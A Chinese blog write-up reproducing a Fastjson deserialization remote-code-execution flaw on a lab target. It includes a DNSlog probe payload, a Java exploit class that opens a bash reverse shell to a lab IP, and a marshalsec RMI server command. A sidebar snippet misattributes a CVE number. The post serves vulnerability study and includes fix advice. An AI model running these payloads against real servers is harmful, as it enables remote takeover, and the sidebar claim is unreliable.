Fastjson<1.2.48远程代码执行漏洞(CNVD-2019-22238)

已于 2023-05-08 14:48:32 修改
阅读量663 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: java fastjson web安全 反序列化
于 2023-05-08 14:32:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40646572/article/details/130557538
版权

漏洞成因

fastjson在对 JSON 字符串进行反序列化的时候,会读取 @type 的内容,试图把 JSON 内容反序列化成这个对象,并且会调用这个类的set方法, 利用这个特性,构造一个 JSON 字符串,并且使 用 @type 反序列化一个自己想要使用的攻击类。
com.sun.rowset.JdbcRowSetImpl就是一个支持调用rmi功能的类。因此可以使用com.sun.rowset.JdbcRowSetImpl类进行远程调用exp。

fastjson默认关闭了反序列化任意类的操作,增加了checkautotype,也就是指定要用来反序列化的类不能够在一些黑名单中,从而做了一定的限制。
此次漏洞利用的核心点是java.lang.class这个java的基础类,在fastjson 1.2.48以前的版本没有做该类做任何限制,加上代码的一些逻辑缺陷,造成黑名单以及autotype的绕过。

漏洞复现过程

启动vulfcous靶机(fastjson版本应该是1.2.48左右的,vaulfocus靶场应该是弄错了。)
在这里插入图片描述
发送请求包,使用bp拦截。
在这里插入图片描述
首先使用java.net.Inet4Address类进行测试下。(首先修改请求方式,其此修改content-type类型为application/json)

在这里插入图片描述

{"x":{"@type":"java.net.Inet4Address","val":"glcbz6.dnslog.cn"}}

在这里插入图片描述
在dnslog平台上,成功看到dns请求记录。

在这里插入图片描述
exp:

import java.io.IOException;
public class exp_jndi {
    static{
        try {
            java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.5.129/4444 0>&1"}); 
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    public static void main(String[] args) {
    }
}

开启python的http服务。
在这里插入图片描述
开启rmi服务。
在这里插入图片描述

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.5.129/#exp_jndi" 1099

payload如下:
在这里插入图片描述
成功反弹shell。
在这里插入图片描述

修复建议

1、升级JDK
JDK6u211 / 7u201 / 8u191 /11.0.1版本,默认禁用了自动加载远程类文件以及LDAP和RMI协议的使用。
2、升级Fastjson到最新版
做好备份后,进行升级。
3、使用安全产品过滤非法内容
添加waf,过滤@type以及对应的各种编码后的字符。
4、更换其它序列化工具
Jackson/Gson

参考链接

Fastjson反序列化漏洞(1.2.24 RCE):https://blog.csdn.net/m0_61506558/article/details/126818902
Fastjson漏洞+复现 :https://www.cnblogs.com/AffectedFish/p/16947318.html

推荐大家看下这篇文章,FastJson1.2.24漏洞复现:https://www.cnblogs.com/xiaozhi789/articles/15918262.html讲解的很不错,调用链简单明了,漏洞原理很清晰。

bigdogeggs
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
weixin_45260839的博客
08-12 715
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
cnvd_2019_22238
qq_59350385的博客
07-12 465
Fastjson 是Alibaba的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。相信利用过Fastjson漏洞的XDM都知道,该漏洞利用需要编写Java利用代码,然后在编译为class文件,在通过rmi/ladp等远程加载实现漏洞利用url:Vulfocus 漏洞威胁分析平台 本地需要安装java环境,启动JNDI-Injection-Exploit-1.0-SNAPSHOT-all
vulfocus/fastjson-cnvd_2019_22238漏洞复现(docker)附问题解决方案
最新发布
weixin_63139305的博客
03-10 930
完整的复现过程,每一步的原理都很详细。使用vulhub的docker,没有使用在线的vulfocus因为连接太不稳定了
Fastjson =1.2.47反序列化RCE漏洞CNVD201922238
king丶
08-21 1493
**Fastjson <=1.2.47反序列化RCE漏洞CNVD201922238) ** **一、漏洞描述 ** Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列 化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法
fastjson CNVD-2019-22238 远程代码执行漏洞
读书 买花 长大
05-19 420
CNVD-2019-22238
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令...
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
CNVD-2019-22238Fastjson 1.2.47 反序列化漏洞复现
冬的博客
03-16 2128
Fastjson 存在反序列化远程代码执行漏洞,当应用或系统使用 Fastjson 对由用户可控的 JSON 字符串数据进行解析时,将可能导致远程代码执行的危害。
fastjson-1.2.48.jar
05-09
com.alibaba.fastjson.JSONObject(JAR包)下载 ,jar包含了json的转换和使用
fastjson-1.2.49
08-09
fastjson是由阿里巴巴提供的,fastJson对于json格式字符串的解析主要用到了一下三个类: JSON:fastJson的解析器,用于JSON格式字符串与JSON对象及javaBean之间的转换。 JSONObject:fastJson提供的json对象。 JSONArray:fastJson提供json数组对象
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
Boom!脑洞大爆炸的博客
07-07 672
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
Fastjson远程代码执行(CNVD-2019-22238)漏洞复现
慢就是快
12-31 5061
文章目录0x00 漏洞简介0x02 影响版本0x03 漏洞复现0x03 指纹识别0x04 注意事项0x05 漏洞修复 0x00 漏洞简介 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 0x01 漏洞详情 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象 Fastjson提供了autotype功能,允许用户在反序列化数据
CNVD-2019-22238——fastjson 代码执行
c0rdXy的博客
09-23 175
fastjson 代码执行
Fastjson漏洞学习——CNVD-2019-22238复现
记录并分享学习安全的知识点..
05-09 1009
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、概述 Fastjson是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个反序列化远程命令执行漏洞,攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 二、影响版本 Fastjson < 1.2.68 ...
Fastjson 1.2.47 远程命令执行漏洞
m0_63241485的博客
08-17 1205
astjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型。Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。...
FastJson 1.2.48的 bug
joez的专栏
05-27 922
FastJson 新版1.2.48版的 bugfastjson bug 老有莫名的 bug 出现,如下代码:     @Test public void testJsonParser() throws IOException { InnerTemplateExecuteContext ctx=new InnerTemplateExecuteContext(); ...
fastjson< 1.2.69远程代码执行漏洞cve编号
01-04
fastjson< 1.2.69远程代码执行漏洞的CVE编号是CVE-2021-21351。该漏洞源于fastjson在处理JSON数据时存在安全漏洞,攻击者可以通过精心构造的JSON数据来实现远程代码执行,从而对系统进行攻击。 漏洞的产生主要是由于fastjson在处理反序列化时存在漏洞,攻击者可以通过构造恶意的JSON数据来触发fastjson反序列化过程,最终实现执行恶意代码的目的。由于fastjson是非常常见的JSON解析库,因此该漏洞可能影响许多使用fastjson的应用程序。 为了防范这一漏洞,建议及时更新fastjson至最新版本,并且在使用fastjson解析JSON数据时,对输入的数据进行严格的验证和过滤,避免恶意JSON数据的注入。此外,也应加强系统安全意识教育,及时关注官方的安全公告,并且注意其他安全防护措施,以保护系统免受漏洞的攻击。 总之,CVE-2021-21351是一个比较严重的远程代码执行漏洞,对系统的安全性造成了潜在威胁。我们应该保持警惕,及时采取相应的安全防护措施,以确保系统的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值